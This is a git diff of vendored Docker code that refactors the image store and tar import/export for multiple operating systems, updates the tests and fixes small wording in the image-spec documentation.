@@ -255,9 +251,7 @@ Here is an example image JSON file:
                 <p>The username or UID which the process in the container should
                 run as. This acts as a default value to use when the value is
                 not specified when creating a container.</p>
-
                 <p>All of the following are valid:</p>
-
                 <ul>
                     <li><code>user</code></li>
                     <li><code>uid</code></li>
@@ -266,7 +260,6 @@ Here is an example image JSON file:
                     <li><code>uid:group</code></li>
                     <li><code>user:gid</code></li>
                 </ul>
-
                 <p>If <code>group</code>/<code>gid</code> is not specified, the
                 default group and supplementary groups of the given
                 <code>user</code>/<code>uid</code> in <code>/etc/passwd</code>
@@ -305,13 +298,11 @@ Here is an example image JSON file:
                 <code>map[string]struct{}</code> and is represented in JSON as
                 an object mapping its keys to an empty object. Here is an
                 example:
-
 <pre>{
     "8080": {},
     "53/udp": {},
     "2356/tcp": {}
 }</pre>
-
                 Its keys can be in the format of:
                 <ul>
                     <li>
@@ -325,9 +316,7 @@ Here is an example image JSON file:
                     </li>
                 </ul>
                 with the default protocol being <code>"tcp"</code> if not
-                specified.
-
-                These values act as defaults and are merged with any specified
+                specified. These values act as defaults and are merged with any specified
                 when creating a container.
             </dd>
             <dt>
@@ -440,7 +429,7 @@ f60c56784b83/
         my-app-tools
 ```
 
-This example change is going add a configuration directory at `/etc/my-app.d`
+This example change is going to add a configuration directory at `/etc/my-app.d`
 which contains a default config file. There's also a change to the
 `my-app-tools` binary to handle the config layout change. The `f60c56784b83`
 directory then looks like this:
@@ -502,21 +491,21 @@ For example, here's what the full archive of `library/busybox` is (displayed in
 ```
 .
 ├── 5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e
-│   ├── VERSION
-│   ├── json
-│   └── layer.tar
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
 ├── a7b8b41220991bfc754d7ad445ad27b7f272ab8b4a2c175b9512b97471d02a8a
-│   ├── VERSION
-│   ├── json
-│   └── layer.tar
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
 ├── a936027c5ca8bf8f517923169a233e391cbb38469a75de8383b5228dc2d26ceb
-│   ├── VERSION
-│   ├── json
-│   └── layer.tar
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
 ├── f60c56784b832dd990022afc120b8136ab3da9528094752ae13fe63a2d28dc8c
-│   ├── VERSION
-│   ├── json
-│   └── layer.tar
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
 └── repositories
 ```
 
diff --git a/vendor/github.com/docker/docker/image/store.go b/vendor/github.com/docker/docker/image/store.go
index b61c456097..9fd7d7dcf3 100644
--- a/vendor/github.com/docker/docker/image/store.go
+++ b/vendor/github.com/docker/docker/image/store.go
@@ -1,14 +1,17 @@
-package image
+package image // import "github.com/docker/docker/image"
 
 import (
 	"encoding/json"
-	"errors"
 	"fmt"
 	"sync"
+	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/digestset"
 	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/system"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // Store is an interface for creating and accessing images
@@ -19,9 +22,12 @@ type Store interface {
 	Search(partialID string) (ID, error)
 	SetParent(id ID, parent ID) error
 	GetParent(id ID) (ID, error)
+	SetLastUpdated(id ID) error
+	GetLastUpdated(id ID) (time.Time, error)
 	Children(id ID) []ID
 	Map() map[ID]*Image
 	Heads() map[ID]*Image
+	Len() int
 }
 
 // LayerGetReleaser is a minimal interface for getting and releasing images.
@@ -36,20 +42,20 @@ type imageMeta struct {
 }
 
 type store struct {
-	sync.Mutex
-	ls        LayerGetReleaser
+	sync.RWMutex
+	lss       map[string]LayerGetReleaser
 	images    map[ID]*imageMeta
 	fs        StoreBackend
-	digestSet *digest.Set
+	digestSet *digestset.Set
 }
 
-// NewImageStore returns new store object for given layer store
-func NewImageStore(fs StoreBackend, ls LayerGetReleaser) (Store, error) {
+// NewImageStore returns new store object for given set of layer stores
+func NewImageStore(fs StoreBackend, lss map[string]LayerGetReleaser) (Store, error) {
 	is := &store{
-		ls:        ls,
+		lss:       lss,
 		images:    make(map[ID]*imageMeta),
 		fs:        fs,
-		digestSet: digest.NewSet(),
+		digestSet: digestset.NewSet(),
 	}
 
 	// load all current images and retain layers
@@ -69,8 +75,15 @@ func (is *store) restore() error {
 		}
 		var l layer.Layer
 		if chainID := img.RootFS.ChainID(); chainID != "" {
-			l, err = is.ls.Get(chainID)
+			if !system.IsOSSupported(img.OperatingSystem()) {
+				return system.ErrNotSupportedOperatingSystem
+			}
+			l, err = is.lss[img.OperatingSystem()].Get(chainID)
 			if err != nil {
+				if err == layer.ErrLayerDoesNotExist {
+					logrus.Errorf("layer does not exist, not restoring image %v, %v, %s", dgst, chainID, img.OperatingSystem())
+					return nil
+				}
 				return err
 			}
 		}
@@ -144,9 +157,12 @@ func (is *store) Create(config []byte) (ID, error) {
 
 	var l layer.Layer
 	if layerID != "" {
-		l, err = is.ls.Get(layerID)
+		if !system.IsOSSupported(img.OperatingSystem()) {
+			return "", system.ErrNotSupportedOperatingSystem
+		}
+		l, err = is.lss[img.OperatingSystem()].Get(layerID)
 		if err != nil {
-			return "", err
+			return "", errors.Wrapf(err, "failed to get layer %s", layerID)
 		}
 	}
 
@@ -164,16 +180,21 @@ func (is *store) Create(config []byte) (ID, error) {
 	return imageID, nil
 }
 
-func (is *store) Search(term string) (ID, error) {
-	is.Lock()
-	defer is.Unlock()
+type imageNotFoundError string
+
+func (e imageNotFoundError) Error() string {
+	return "No such image: " + string(e)
+}
+
+func (imageNotFoundError) NotFound() {}
 
+func (is *store) Search(term string) (ID, error) {
 	dgst, err := is.digestSet.Lookup(term)
 	if err != nil {
-		if err == digest.ErrDigestNotFound {
-			err = fmt.Errorf("No such image: %s", term)
+		if err == digestset.ErrDigestNotFound {
+			err = imageNotFoundError(term)
 		}
-		return "", err
+		return "", errors.WithStack(err)
 	}
 	return IDFromDigest(dgst), nil
 }
@@ -208,6 +229,13 @@ func (is *store) Delete(id ID) ([]layer.Metadata, error) {
 	if imageMeta == nil {
 		return nil, fmt.Errorf("unrecognized image ID %s", id.String())
 	}
+	img, err := is.Get(id)
+	if err != nil {
+		return nil, fmt.Errorf("unrecognized image %s, %v", id.String(), err)
+	}
+	if !system.IsOSSupported(img.OperatingSystem()) {
+		return nil, fmt.Errorf("unsupported image operating system %q", img.OperatingSystem())
+	}
 	for id := range imageMeta.children {
 		is.fs.DeleteMetadata(id.Digest(), "parent")
 	}
@@ -222,7 +250,7 @@ func (is *store) Delete(id ID) ([]layer.Metadata, error) {
 	is.fs.Delete(id.Digest())
 
 	if imageMeta.layer != nil {
-		return is.ls.Release(imageMeta.layer)
+		return is.lss[img.OperatingSystem()].Release(imageMeta.layer)
 	}
 	return nil, nil
 }
@@ -249,9 +277,25 @@ func (is *store) GetParent(id ID) (ID, error) {
 	return ID(d), nil // todo: validate?
 }
 
+// SetLastUpdated time for the image ID to the current time
+func (is *store) SetLastUpdated(id ID) error {
+	lastUpdated := []byte(time.Now().Format(time.RFC3339Nano))
+	return is.fs.SetMetadata(id.Digest(), "lastUpdated", lastUpdated)
+}
+
+// GetLastUpdated time for the image ID
+func (is *store) GetLastUpdated(id ID) (time.Time, error) {
+	bytes, err := is.fs.GetMetadata(id.Digest(), "lastUpdated")
+	if err != nil || len(bytes) == 0 {
+		// No lastUpdated time
+		return time.Time{}, nil
+	}
+	return time.Parse(time.RFC3339Nano, string(bytes))
+}
+
 func (is *store) Children(id ID) []ID {
-	is.Lock()
-	defer is.Unlock()
+	is.RLock()
+	defer is.RUnlock()
 
 	return is.children(id)
 }
@@ -275,8 +319,8 @@ func (is *store) Map() map[ID]*Image {
 }
 
 func (is *store) imagesMap(all bool) map[ID]*Image {
-	is.Lock()
-	defer is.Unlock()
+	is.RLock()
+	defer is.RUnlock()
 
 	images := make(map[ID]*Image)
 
@@ -293,3 +337,9 @@ func (is *store) imagesMap(all bool) map[ID]*Image {
 	}
 	return images
 }
+
+func (is *store) Len() int {
+	is.RLock()
+	defer is.RUnlock()
+	return len(is.images)
+}
diff --git a/vendor/github.com/docker/docker/image/store_test.go b/vendor/github.com/docker/docker/image/store_test.go
index 50f8aa8b84..0edf3282af 100644
--- a/vendor/github.com/docker/docker/image/store_test.go
+++ b/vendor/github.com/docker/docker/image/store_test.go
@@ -1,292 +1,189 @@
-package image
+package image // import "github.com/docker/docker/image"
 
 import (
-	"io/ioutil"
-	"os"
+	"fmt"
+	"runtime"
 	"testing"
 
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/layer"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/assert"
+	"gotest.tools/assert/cmp"
 )
 
 func TestRestore(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
+	fs, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
 
 	id1, err := fs.Set([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	_, err = fs.Set([]byte(`invalid`))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	id2, err := fs.Set([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	err = fs.SetMetadata(id2, "parent", []byte(id1))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	is, err := NewImageStore(fs, &mockLayerGetReleaser{})
-	if err != nil {
-		t.Fatal(err)
-	}
+	mlgrMap := make(map[string]LayerGetReleaser)
+	mlgrMap[runtime.GOOS] = &mockLayerGetReleaser{}
+	is, err := NewImageStore(fs, mlgrMap)
+	assert.NilError(t, err)
 
-	imgs := is.Map()
-	if actual, expected := len(imgs), 2; actual != expected {
-		t.Fatalf("invalid images length, expected 2, got %q", len(imgs))
-	}
+	assert.Check(t, cmp.Len(is.Map(), 2))
 
 	img1, err := is.Get(ID(id1))
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if actual, expected := img1.computedID, ID(id1); actual != expected {
-		t.Fatalf("invalid image ID: expected %q, got %q", expected, actual)
-	}
-
-	if actual, expected := img1.computedID.String(), string(id1); actual != expected {
-		t.Fatalf("invalid image ID string: expected %q, got %q", expected, actual)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(ID(id1), img1.computedID))
+	assert.Check(t, cmp.Equal(string(id1), img1.computedID.String()))
 
 	img2, err := is.Get(ID(id2))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal("abc", img1.Comment))
+	assert.Check(t, cmp.Equal("def", img2.Comment))
 
-	if actual, expected := img1.Comment, "abc"; actual != expected {
-		t.Fatalf("invalid comment for image1: expected %q, got %q", expected, actual)
-	}
+	_, err = is.GetParent(ID(id1))
+	assert.ErrorContains(t, err, "failed to read metadata")
 
-	if actual, expected := img2.Comment, "def"; actual != expected {
-		t.Fatalf("invalid comment for image2: expected %q, got %q", expected, actual)
-	}
-
-	p, err := is.GetParent(ID(id1))
-	if err == nil {
-		t.Fatal("expected error for getting parent")
-	}
-
-	p, err = is.GetParent(ID(id2))
-	if err != nil {
-		t.Fatal(err)
-	}
-	if actual, expected := p, ID(id1); actual != expected {
-		t.Fatalf("invalid parent: expected %q, got %q", expected, actual)
-	}
+	p, err := is.GetParent(ID(id2))
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(ID(id1), p))
 
 	children := is.Children(ID(id1))
-	if len(children) != 1 {
-		t.Fatalf("invalid children length: %q", len(children))
-	}
-	if actual, expected := children[0], ID(id2); actual != expected {
-		t.Fatalf("invalid child for id1: expected %q, got %q", expected, actual)
-	}
-
-	heads := is.Heads()
-	if actual, expected := len(heads), 1; actual != expected {
-		t.Fatalf("invalid images length: expected %q, got %q", expected, actual)
-	}
+	assert.Check(t, cmp.Len(children, 1))
+	assert.Check(t, cmp.Equal(ID(id2), children[0]))
+	assert.Check(t, cmp.Len(is.Heads(), 1))
 
 	sid1, err := is.Search(string(id1)[:10])
-	if err != nil {
-		t.Fatal(err)
-	}
-	if actual, expected := sid1, ID(id1); actual != expected {
-		t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(ID(id1), sid1))
 
 	sid1, err = is.Search(digest.Digest(id1).Hex()[:6])
-	if err != nil {
-		t.Fatal(err)
-	}
-	if actual, expected := sid1, ID(id1); actual != expected {
-		t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(ID(id1), sid1))
 
 	invalidPattern := digest.Digest(id1).Hex()[1:6]
 	_, err = is.Search(invalidPattern)
-	if err == nil {
-		t.Fatalf("expected search for %q to fail", invalidPattern)
-	}
-
+	assert.ErrorContains(t, err, "No such image")
 }
 
 func TestAddDelete(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	is, err := NewImageStore(fs, &mockLayerGetReleaser{})
-	if err != nil {
-		t.Fatal(err)
-	}
+	is, cleanup := defaultImageStore(t)
+	defer cleanup()
 
 	id1, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`))
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if actual, expected := id1, ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"); actual != expected {
-		t.Fatalf("create ID mismatch: expected %q, got %q", expected, actual)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"), id1))
 
 	img, err := is.Get(id1)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if actual, expected := img.Comment, "abc"; actual != expected {
-		t.Fatalf("invalid comment in image: expected %q, got %q", expected, actual)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal("abc", img.Comment))
 
 	id2, err := is.Create([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	err = is.SetParent(id2, id1)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	pid1, err := is.GetParent(id2)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if actual, expected := pid1, id1; actual != expected {
-		t.Fatalf("invalid parent for image: expected %q, got %q", expected, actual)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(pid1, id1))
 
 	_, err = is.Delete(id1)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	_, err = is.Get(id1)
-	if err == nil {
-		t.Fatalf("expected get for deleted image %q to fail", id1)
-	}
+	assert.ErrorContains(t, err, "failed to get digest")
+
 	_, err = is.Get(id2)
-	if err != nil {
-		t.Fatal(err)
-	}
-	pid1, err = is.GetParent(id2)
-	if err == nil {
-		t.Fatalf("expected parent check for image %q to fail, got %q", id2, pid1)
-	}
+	assert.NilError(t, err)
 
+	_, err = is.GetParent(id2)
+	assert.ErrorContains(t, err, "failed to read metadata")
 }
 
 func TestSearchAfterDelete(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	is, err := NewImageStore(fs, &mockLayerGetReleaser{})
-	if err != nil {
-		t.Fatal(err)
-	}
+	is, cleanup := defaultImageStore(t)
+	defer cleanup()
 
 	id, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	id1, err := is.Search(string(id)[:15])
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(id1, id))
 
-	if actual, expected := id1, id; expected != actual {
-		t.Fatalf("wrong id returned from search: expected %q, got %q", expected, actual)
-	}
-
-	if _, err := is.Delete(id); err != nil {
-		t.Fatal(err)
-	}
+	_, err = is.Delete(id)
+	assert.NilError(t, err)
 
-	if _, err := is.Search(string(id)[:15]); err == nil {
-		t.Fatal("expected search after deletion to fail")
-	}
+	_, err = is.Search(string(id)[:15])
+	assert.ErrorContains(t, err, "No such image")
 }
 
 func TestParentReset(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	is, err := NewImageStore(fs, &mockLayerGetReleaser{})
-	if err != nil {
-		t.Fatal(err)
-	}
+	is, cleanup := defaultImageStore(t)
+	defer cleanup()
 
 	id, err := is.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	id2, err := is.Create([]byte(`{"comment": "abc2", "rootfs": {"type": "layers"}}`))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	id3, err := is.Create([]byte(`{"comment": "abc3", "rootfs": {"type": "layers"}}`))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	if err := is.SetParent(id, id2); err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, is.SetParent(id, id2))
+	assert.Check(t, cmp.Len(is.Children(id2), 1))
 
-	ids := is.Children(id2)
-	if actual, expected := len(ids), 1; expected != actual {
-		t.Fatalf("wrong number of children: %d, got %d", expected, actual)
-	}
+	assert.Check(t, is.SetParent(id, id3))
+	assert.Check(t, cmp.Len(is.Children(id2), 0))
+	assert.Check(t, cmp.Len(is.Children(id3), 1))
+}
 
-	if err := is.SetParent(id, id3); err != nil {
-		t.Fatal(err)
-	}
+func defaultImageStore(t *testing.T) (Store, func()) {
+	fsBackend, cleanup := defaultFSStoreBackend(t)
 
-	ids = is.Children(id2)
-	if actual, expected := len(ids), 0; expected != actual {
-		t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual)
-	}
+	mlgrMap := make(map[string]LayerGetReleaser)
+	mlgrMap[runtime.GOOS] = &mockLayerGetReleaser{}
+	store, err := NewImageStore(fsBackend, mlgrMap)
+	assert.NilError(t, err)
 
-	ids = is.Children(id3)
-	if actual, expected := len(ids), 1; expected != actual {
-		t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual)
-	}
+	return store, cleanup
+}
+
+func TestGetAndSetLastUpdated(t *testing.T) {
+	store, cleanup := defaultImageStore(t)
+	defer cleanup()
+
+	id, err := store.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`))
+	assert.NilError(t, err)
+
+	updated, err := store.GetLastUpdated(id)
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(updated.IsZero(), true))
 
+	assert.Check(t, store.SetLastUpdated(id))
+
+	updated, err = store.GetLastUpdated(id)
+	assert.NilError(t, err)
+	assert.Check(t, cmp.Equal(updated.IsZero(), false))
+}
+
+func TestStoreLen(t *testing.T) {
+	store, cleanup := defaultImageStore(t)
+	defer cleanup()
+
+	expected := 10
+	for i := 0; i < expected; i++ {
+		_, err := store.Create([]byte(fmt.Sprintf(`{"comment": "abc%d", "rootfs": {"type": "layers"}}`, i)))
+		assert.NilError(t, err)
+	}
+	numImages := store.Len()
+	assert.Equal(t, expected, numImages)
+	assert.Equal(t, len(store.Map()), numImages)
 }
 
 type mockLayerGetReleaser struct{}
diff --git a/vendor/github.com/docker/docker/image/tarexport/load.go b/vendor/github.com/docker/docker/image/tarexport/load.go
index 01edd91fb7..c89dd08f93 100644
--- a/vendor/github.com/docker/docker/image/tarexport/load.go
+++ b/vendor/github.com/docker/docker/image/tarexport/load.go
@@ -1,17 +1,18 @@
-package tarexport
+package tarexport // import "github.com/docker/docker/image/tarexport"
 
 import (
 	"encoding/json"
+	"errors"
 	"fmt"
 	"io"
 	"io/ioutil"
 	"os"
 	"path/filepath"
 	"reflect"
+	"runtime"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/image/v1"
 	"github.com/docker/docker/layer"
@@ -22,18 +23,16 @@ import (
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/pkg/symlink"
 	"github.com/docker/docker/pkg/system"
-	"github.com/docker/docker/reference"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 )
 
 func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) error {
-	var (
-		sf             = streamformatter.NewJSONStreamFormatter()
-		progressOutput progress.Output
-	)
+	var progressOutput progress.Output
 	if !quiet {
-		progressOutput = sf.NewProgressOutput(outStream, false)
+		progressOutput = streamformatter.NewJSONProgressOutput(outStream, false)
 	}
-	outStream = &streamformatter.StdoutFormatter{Writer: outStream, StreamFormatter: streamformatter.NewJSONStreamFormatter()}
+	outStream = streamformatter.NewStdoutWriter(outStream)
 
 	tmpDir, err := ioutil.TempDir("", "docker-import-")
 	if err != nil {
@@ -80,12 +79,25 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool)
 		if err != nil {
 			return err
 		}
-		var rootFS image.RootFS
-		rootFS = *img.RootFS
+		if err := checkCompatibleOS(img.OS); err != nil {
+			return err
+		}
+		rootFS := *img.RootFS
 		rootFS.DiffIDs = nil
 
 		if expected, actual := len(m.Layers), len(img.RootFS.DiffIDs); expected != actual {
-			return fmt.Errorf("invalid manifest, layers length mismatch: expected %q, got %q", expected, actual)
+			return fmt.Errorf("invalid manifest, layers length mismatch: expected %d, got %d", expected, actual)
+		}
+
+		// On Windows, validate the platform, defaulting to windows if not present.
+		os := img.OS
+		if os == "" {
+			os = runtime.GOOS
+		}
+		if runtime.GOOS == "windows" {
+			if (os != "windows") && (os != "linux") {
+				return fmt.Errorf("configuration for this image has an unsupported operating system: %s", os)
+			}
 		}
 
 		for i, diffID := range img.RootFS.DiffIDs {
@@ -95,14 +107,14 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool)
 			}
 			r := rootFS
 			r.Append(diffID)
-			newLayer, err := l.ls.Get(r.ChainID())
+			newLayer, err := l.lss[os].Get(r.ChainID())
 			if err != nil {
-				newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), m.LayerSources[diffID], progressOutput)
+				newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), os, m.LayerSources[diffID], progressOutput)
 				if err != nil {
 					return err
 				}
 			}
-			defer layer.ReleaseAndLog(l.ls, newLayer)
+			defer layer.ReleaseAndLog(l.lss[os], newLayer)
 			if expected, actual := diffID, newLayer.DiffID(); expected != actual {
 				return fmt.Errorf("invalid diffID for layer %d: expected %q, got %q", i, expected, actual)
 			}
@@ -117,7 +129,7 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool)
 
 		imageRefCount = 0
 		for _, repoTag := range m.RepoTags {
-			named, err := reference.ParseNamed(repoTag)
+			named, err := reference.ParseNormalizedNamed(repoTag)
 			if err != nil {
 				return err
 			}
@@ -126,7 +138,7 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool)
 				return fmt.Errorf("invalid tag %q", repoTag)
 			}
 			l.setLoadedTag(ref, imgID.Digest(), outStream)
-			outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", ref)))
+			outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", reference.FamiliarString(ref))))
 			imageRefCount++
 		}
 
@@ -164,7 +176,7 @@ func (l *tarexporter) setParentID(id, parentID image.ID) error {
 	return l.is.SetParent(id, parentID)
 }
 
-func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) {
+func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, os string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) {
 	// We use system.OpenSequential to use sequential file access on Windows, avoiding
 	// depleting the standby list. On Linux, this equates to a regular os.Open.
 	rawTar, err := system.OpenSequential(filename)
@@ -193,24 +205,25 @@ func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string,
 	}
 	defer inflatedLayerData.Close()
 
-	if ds, ok := l.ls.(layer.DescribableStore); ok {
+	if ds, ok := l.lss[os].(layer.DescribableStore); ok {
 		return ds.RegisterWithDescriptor(inflatedLayerData, rootFS.ChainID(), foreignSrc)
 	}
-	return l.ls.Register(inflatedLayerData, rootFS.ChainID())
+	return l.lss[os].Register(inflatedLayerData, rootFS.ChainID())
 }
 
-func (l *tarexporter) setLoadedTag(ref reference.NamedTagged, imgID digest.Digest, outStream io.Writer) error {
+func (l *tarexporter) setLoadedTag(ref reference.Named, imgID digest.Digest, outStream io.Writer) error {
 	if prevID, err := l.rs.Get(ref); err == nil && prevID != imgID {
-		fmt.Fprintf(outStream, "The image %s already exists, renaming the old one with ID %s to empty string\n", ref.String(), string(prevID)) // todo: this message is wrong in case of multiple tags
+		fmt.Fprintf(outStream, "The image %s already exists, renaming the old one with ID %s to empty string\n", reference.FamiliarString(ref), string(prevID)) // todo: this message is wrong in case of multiple tags
 	}
 
-	if err := l.rs.AddTag(ref, imgID, true); err != nil {
-		return err
-	}
-	return nil
+	return l.rs.AddTag(ref, imgID, true)
 }
 
 func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOutput progress.Output) error {
+	if runtime.GOOS == "windows" {
+		return errors.New("Windows does not support legacy loading of images")
+	}
+
 	legacyLoadedMap := make(map[string]image.ID)
 
 	dirs, err := ioutil.ReadDir(tmpDir)
@@ -249,7 +262,7 @@ func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOut
 			if !ok {
 				return fmt.Errorf("invalid target ID: %v", oldID)
 			}
-			named, err := reference.WithName(name)
+			named, err := reference.ParseNormalizedNamed(name)
 			if err != nil {
 				return err
 			}
@@ -278,11 +291,21 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str
 		return err
 	}
 
-	var img struct{ Parent string }
+	var img struct {
+		OS     string
+		Parent string
+	}
 	if err := json.Unmarshal(imageJSON, &img); err != nil {
 		return err
 	}
 
+	if err := checkCompatibleOS(img.OS); err != nil {
+		return err
+	}
+	if img.OS == "" {
+		img.OS = runtime.GOOS
+	}
+
 	var parentID image.ID
 	if img.Parent != "" {
 		for {
@@ -315,7 +338,7 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str
 	if err != nil {
 		return err
 	}
-	newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, distribution.Descriptor{}, progressOutput)
+	newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, img.OS, distribution.Descriptor{}, progressOutput)
 	if err != nil {
 		return err
 	}
@@ -336,7 +359,7 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str
 		return err
 	}
 
-	metadata, err := l.ls.Release(newLayer)
+	metadata, err := l.lss[img.OS].Release(newLayer)
 	layer.LogReleaseMetadata(metadata)
 	if err != nil {
 		return err
@@ -388,3 +411,19 @@ func checkValidParent(img, parent *image.Image) bool {
 	}
 	return true
 }
+
+func checkCompatibleOS(imageOS string) error {
+	// always compatible if the images OS matches the host OS; also match an empty image OS
+	if imageOS == runtime.GOOS || imageOS == "" {
+		return nil
+	}
+	// On non-Windows hosts, for compatibility, fail if the image is Windows.
+	if runtime.GOOS != "windows" && imageOS == "windows" {
+		return fmt.Errorf("cannot load %s image on %s", imageOS, runtime.GOOS)
+	}
+	// Finally, check the image OS is supported for the platform.
+	if err := system.ValidatePlatform(system.ParsePlatform(imageOS)); err != nil {
+		return fmt.Errorf("cannot load %s image on %s: %s", imageOS, runtime.GOOS, err)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/image/tarexport/save.go b/vendor/github.com/docker/docker/image/tarexport/save.go
index 6e3a5bc589..4e734b3503 100644
--- a/vendor/github.com/docker/docker/image/tarexport/save.go
+++ b/vendor/github.com/docker/docker/image/tarexport/save.go
@@ -1,4 +1,4 @@
-package tarexport
+package tarexport // import "github.com/docker/docker/image/tarexport"
 
 import (
 	"encoding/json"
@@ -6,22 +6,27 @@ import (
 	"io"
 	"io/ioutil"
 	"os"
+	"path"
 	"path/filepath"
+	"runtime"
 	"time"
 
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/image/v1"
 	"github.com/docker/docker/layer"
